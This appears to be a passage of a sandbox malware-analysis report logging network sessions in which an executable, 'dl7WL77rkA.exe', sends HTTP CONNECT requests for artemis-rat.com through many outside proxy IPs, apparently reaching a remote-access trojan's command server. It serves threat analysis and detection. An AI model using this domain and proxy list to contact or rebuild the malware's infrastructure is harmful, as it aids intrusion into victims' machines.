                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1475192.168.2.553907202.8.74.1080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.650676012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.971265078 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1476192.168.2.553925216.137.184.253803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.650746107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.316951036 CET965INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Content-Length: 663
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 65 72 2e 73 65 6e 61 2e 63 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1477192.168.2.55409643.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.657568932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1478192.168.2.55396865.109.211.10131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.657901049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.067836046 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1479192.168.2.553962194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.660300970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1480192.168.2.55390093.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664257050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1481192.168.2.554027167.172.159.43313063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664527893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1482192.168.2.554087104.16.109.207803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664572954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.819835901 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1483192.168.2.553985186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664679050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1484192.168.2.553998212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665540934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1485192.168.2.553987190.14.32.20956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665714979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1486192.168.2.553904109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665739059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1487192.168.2.55400558.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.670047998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1488192.168.2.553872102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.673114061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1489192.168.2.55396658.20.248.13990023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.673181057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.035546064 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1490192.168.2.552584194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.677804947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1491192.168.2.55411843.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.681703091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1492192.168.2.554004193.239.56.8480813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.681812048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1493192.168.2.549884103.35.189.21710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.682320118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.796971083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852313995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.921468973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1494192.168.2.55412043.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.684083939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1495192.168.2.55412243.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.687072039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1496192.168.2.553530197.157.254.16241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.691184044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1497192.168.2.55403558.221.193.7488883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.692876101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.009315968 CET348INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Server: MyWebServer/3.6.20 Unicode (By TGY)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; Charset=GB2312
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 3e 3c 68 33 3e 4d 79 57 65 62 53 65 72 76 65 72 2f 33 2e 36 2e 32 30 20 55 6e 69 63 6f 64 65 20 28 42 79 20 54 47 59 29 3c 2f 68 33 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1498192.168.2.55404920.37.207.880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.693738937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.920250893 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1499192.168.2.554025167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.700043917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1500192.168.2.552601177.231.245.18280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.780405998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905128956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
